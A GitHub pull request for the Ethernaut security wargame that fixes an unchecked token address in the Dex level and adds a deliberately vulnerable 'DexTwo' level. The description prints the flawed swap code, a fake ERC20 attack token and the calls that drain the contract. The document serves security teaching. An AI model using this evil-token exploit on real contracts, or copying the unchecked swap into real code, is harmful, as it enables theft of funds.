### PR TITLE
New Level: DexTwo: Attack of the Evil Token

### PR DESCRIPTION
**Pull request by scottt**
The `Dex` level in Ethernaut, currently doesn't check that the ERC20 addresses are the ones it expects:

```
contract Dex {
  function swap(address from, address to, uint amount) public {
        require(IERC20(from).balanceOf(msg.sender) >= amount, "Not enough to swap");
        uint swap_amount = get_swap_amount(from, to, amount);
        IERC20(from).transferFrom(msg.sender, address(this), amount);
        IERC20(to).approve(address(this), swap_amount);
        IERC20(to).transferFrom(address(this), msg.sender, swap_amount);
    }
    function get_swap_amount(address from, address to, uint amount) public view returns(uint){
        return((amount * IERC20(to).balanceOf(address(this)))/IERC20(from).balanceOf(address(this)));
    }
}
  ```

The player can supply the address of an `DexAttackToken` instance as the input:

```
contract DexAttackToken {
    function balanceOf(address) external pure returns (uint256) {
        return 1;
    }

    function transferFrom(
        address,
        address,
        uint256
    ) external pure returns (bool) {
        return true;
    }
}
```

Swapping from `DexAttackToken` to `token1` and `token2` would then drain the balance of the Dex contract:

```
dex.swap(attackToken.address, token1.address, 1)
dex.swap(attackToken.address, token2.address, 1)
```

This patch proposes the following:

* Add a `require((from == token1 && to == token2) ... )` to `swap` in the current `Dex` level
* Create a new level, Dex Two, which keeps the vulnerability to the "evil token attack"
* Explicitly require the player to drain `DexTwo` of both `token1` and `token2` balances
* Give the player a hint to try an attack vector with a custom ERC20 token contract

### CODE REVIEW

**Comment by xaler5** [comment]
Hey @scottt thanks for this and for continously improving Ethernaut.

I took a quick look at it. Would you mind changing `Dex2` and `SwappableToken2` for `DexTwo` and `SwappableTokenTwo`  for consistency with levels names (i.e. Gatekeepers) ?

**Comment by scottt** [comment]
>  Change Dex2 and SwappableToken2 for DexTwo and SwappableTokenTwo for consistency

Will do.

**Comment by scottt** [comment]
Done here: https://github.com/OpenZeppelin/ethernaut/compare/46222f29b251f6d4bba67df945f47a974568415d..d8e0b98c81c40dcd2c983adf3acd584c7a0b893f

I verified that all contract unit tests pass locally.

**Comment by scottt** [comment]
I improved the description of the vulnerability that motivated this new level in the commit message.

**Comment by scottt** [comment]
Hi @xaler5 , I've addressed the review comments. Could you take another look and give this PR an review?

**Comment by xaler5** [comment]
Just reviewed and tested locally. It seems legit to me, thanks for reviewing it. 

Missing items:

- JSONs generation of both affected levels 
- Rinkeby deployment

 I'll coordinate this with @frangio

**Review by xaler5 — APPROVED** [review]

**Comment by xaler5** [comment]
Merging :partying_face:

**Pull request merged**
